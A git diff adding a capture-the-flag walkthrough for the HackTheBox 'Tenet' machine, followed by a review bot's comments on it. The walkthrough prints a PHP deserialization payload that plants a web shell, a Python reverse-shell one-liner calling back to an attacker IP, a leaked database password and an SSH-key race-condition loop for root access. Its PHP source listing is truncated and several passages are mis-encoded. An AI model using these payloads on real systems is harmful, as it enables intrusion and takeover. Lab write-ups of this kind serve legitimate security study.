diff --git a/HackTheBox/Tenet.md b/HackTheBox/Tenet.md
new file mode 100644
index 0000000..56ccc9a
--- /dev/null
+++ b/HackTheBox/Tenet.md
@@ -0,0 +1,290 @@
+# HackTheBox-Tenet
+
+## Rustscan
+
+```bash
+rustscan -a 10.10.10.223 -- -A -sC -sV
+.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
+| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
+| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
+`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+Nmap? More like slowmap.đ˘
+[~] The config file is expected to be at "/root/.rustscan.toml"
+[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
+[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
+Open 10.10.10.223:22
+Open 10.10.10.223:80
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDA4SymrtoAxhSnm6gIUPFcp1VhjoVue64X4LIvoYolM5BQPblUj2aezdd9aRI227jVzfkOD4Kg3OW2yT5uxFljn7q/Mh5/muGvUNA+nNO6pC
+C0tZPoPEwMT+QvR3XyQXxbP6povh4GISBySLw/DFQoG3A2t80Giyq5Q7P+1LH1f/m63DyiNXOPS8fNBPz59BDEgC9jJ5Lu2DTu8ko1xE/85MLYyBKRSFHEkqagRXIYUwVQASHgo3OoJ+VAcBTJZH
+1TmXDc4c6W0hIPpQW5dyvj3tdjKjlIkw6dH2at9NL3gnTP5xnsoiOu0dyofm2L5fvBpzvOzUnQ2rps2wANTZwZ
+| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLMM1BQpjspHo9teJwTFZntx+nxj8D51/Nu0nI3atUpyPg/bXlNYi26boH8zYTrC6fWepgaG2G
+ZigAqxN4yuwgo=
+| 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMQeNqzXOE6aVR3ulHIyB8EGf1ZaUSCNuou5+cgmNXvt
+80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
+| http-methods:
+|_ Supported Methods: POST OPTIONS HEAD GET
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Apache2 Ubuntu Default Page: It works
+Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
+```
+
+## PORT 80 (HTTP)
+
+Visting the web page it shows default apache web page
+
+
+
+Running `dirsearch`
+
+
+
+Now this doesn't loads css so looking at the source it shows the there's a domain
+
+`tenet.htb`
+
+
+
+Adding this to `/etc/hosts` file
+
+
+
+We can see some posts on the main page
+
+
+
+```python
+Weâre looking for beta testers of our new time-management software, âRotasâ
+
+âRotasâ will hopefully be coming to market late 2021, pending rigorous QA from our developers, and you!
+
+For more information regarding opting-in, watch this space.
+
+Published December 16, 2020 By [protagonist]
+```
+
+```python
+Weâre moving our data over from a flat file structure to something a bit more substantial. Please bear with us whilst we get one of our devs on the migration, which shouldnât take too long.
+
+Thank you for your patience
+
+Published December 16, 2020 By [protagonist]
+```
+
+This post had a comment
+
+```python
+[neil]
+
+[December 16, 2020 at 2:53 pm]
+
+did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?!
+```
+
+So we have some information that there are two users neil and protagonist also there's a php file and backup folder
+
+We could have alternatively done this through `wpscan`
+
+
+
+
+
+I tried bruteforcing through wpscan but it didn't found any password
+
+
+
+
+Going back to that apache default page I tried to include `sator.php` and got something
+
+
+
+If we focus on the comment which was made on the post "the sator php file and the backup"
+
+
+
+We will get a backup file for `staor.php`
+
+```php
+';
+ $this-> data = 'Success';
+ }
+
+
+ public function __destruct()
+ {
+ file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
+ echo '[] Database updated
';
+ // echo 'Gotta get this working properly...';
+ }
+}
+
+$input = $_GET['arepo'] ?? '';
+$databaseupdate = unserialize($input);
+
+$app = new DatabaseExport;
+$app -> update_db();
+
+
+?>
+
+```
+
+
+## PHP Deserlization attack
+
+We can see here that there's a class `DatabaseExport` in which there are two public variables `user_file` and `data` and in this class there's a public function called `update_db()` which will set the `data` variable to "sucess" which is just a text as you can see from the sator.php show on the web browser at the end there's a magic function `__destruct()` which will be automatcially called when an object is destroyed , there the `user_file` will be made with the contents from `data` and will put in the web directory which means users.txt will be created in the web directory having the data "success".
+
+At the end we can the `GET` parameter `arepo` , now here exists a vulnerability which is known as** PHP Deserilization**
+
+So to exploit this we have to modify the class variables in this case `user_file` and `data` and seriliaze it , once we get the serliazed string we pass it to `arepo` paramter.
+
+
+
+After running it we will get a php serialized object
+
+
+
+But we need to pass this to GET paramter in a url encoded form so I used cyberchef to do that
+
+
+
+And then paste into the GET parameter
+
+```bash
+http://10.10.10.223/sator.php?arepo=O:14:%22DatabaseExport%22:2:%7Bs:9:%22user_file%22;s:9:%22shell.php%22;s:4:%22data%22;s:29:%22%3C?php%20system($_GET%5B%22cmd%22%5D);?%3E%22;%7D
+```
+
+
+
+We can see the message "Database updated" so let's see if `shell.php` was made on the web directory or not.
+
+
+
+
+
+And we have a rce, cool !
+
+
+
+Python3 is installed so we can get a reverse shell through it
+
+```bash
+http://10.10.10.223/shell.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.198",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
+```
+
+
+
+Stabilize the shell
+
+
+
+Let's check the cron jobs
+
+
+
+Open ports
+
+
+
+## Escalating to user
+
+We see mysql running on localhost so we can try to find creds for mysql and since wordpress is hosted the creds are in `wp-config.php` file
+
+
+
+
+
+```bash
+/** MySQL database username */
+define( 'DB_USER', 'neil' );
+/** MySQL database password */
+define( 'DB_PASSWORD', 'Opera2112' );
+
+/** MySQL hostname */
+define( 'DB_HOST', 'localhost' );
+
+```
+
+The db user is `neil` so this is interesting as neil is also the user on the linux machine so let's try this password
+
+
+
+## Privilege Escalation
+
+Doing `sudo -l` we can see what we run as sudo
+
+
+
+Reading the contents of the bash script
+
+
+
+Here these functions are not that interesting , if we go to the bottom
+
+
+
+We can see a function `addkey()` in which a temporary file is being made with command `mktemp`
+
+
+
+If we run this command on our local machine to see what file name it generates we can see that the file name it's pretty unique everytime this command runs
+
+
+
+On the target machine it also generates a random name
+
+
+
+
+In the script that file is being removed but that's the file need to put in our ssh public key so we need to run a loop in which we try to put our public key in every file that starts with `ssh` so we have to utilize wildcard here ( * )
+
+
+So our one liner script should look like this
+
+```bash
+while true; do var=$(ls /tmp |grep ssh);echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzKK/Hru6t4lA0tu4CX8E3BzkM8Bl7cFxyheVBHZS+flyqq
+/sZuRfPHCQE2LNL5IgRfHDljFO4MuiYJgrMr8jCA+stDBxGAhCiRZ4UmZ7OYn1abGGOmtUyaCYvJp3pizvcyVIJsNBQBSk1JETfopgKCydtXfbXYF8kukjM29AVbIoD99UAmo8Qm1RDv+cguO+0q
+Tg1vHMErURIyM/P3fhNakGL2F1/rENpvqB7EK06N6KYLujCf9Y87slTCU33gHoo5iG5mX5JFi2pBhWJnOQECjaeEsTjvKKvgIX7wy14b3I4b7fLstsXg69CCE9KF5Zr1uWYP0JGG1pB0OrDH4LPj
+MRxDALCKMnA4F8OrSmTzfgWJ9LhxxFHh73ExsfGJYypBuSOxh+4UBSuF5znPbJo315Qd05LEcpCAv623vqjsUDQUEMeJVz0NiWkGCuJIxt+YTGinB9hDj58seHsI4yMZe5HtY5cQJLR09/fVoGPi
+ebD/lFk68jQFonJs73NlPE= root@kali' | tee $var ;done
+```
+
+We are running a while loop infinite number of times and in there we have a variable which is grabbing the name of the random generated ssh file , next we are printing our public ssh key and piping it to that file and logging it with the help of `tee`
+
+So first I will run the `enableSSH` script
+
+
+
+Then will run my one liner bash script
+
+
+
+
+
+After running it for some time and terminated both the scripts and in the `/tmp` folder you will see those randomly generated ssh file , some of them will have no content as the temp file gets deleted.
+
+
+
+Try to ssh in the target machine using ssh private key
+
+
\ No newline at end of file
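Review bot: The `sator.php` backup listing in the added file is truncated. Its php block opens at `';` followed by `$this-> data = 'Success';`, so the `<?php` tag, the `DatabaseExport` class declaration, the `user_file` and `data` properties and the start of `update_db()` are never shown. The "PHP Deserlization attack" section analyses exactly those parts, so a reader cannot check its explanation of `__destruct()` and `unserialize($input)` against the source; please paste the complete backup file. Other points in the same file:
- The RustScan banner and the quoted blog posts contain mis-encoded characters (`đ˘`, `Weâre`, `âRotasâ`); re-save the file as UTF-8.
- The post and comment quotes are fenced as `python`, and the URLs and the `wp-config.php` excerpt as `bash`; plain text and `php` would fit better.
- Several steps ("Running `dirsearch`", "After running it we will get a php serialized object", "Reading the contents of the bash script") are followed only by blank lines, so the command or output they refer to is missing.
- `staor.php` should read `sator.php`.
- The file ends without a trailing newline.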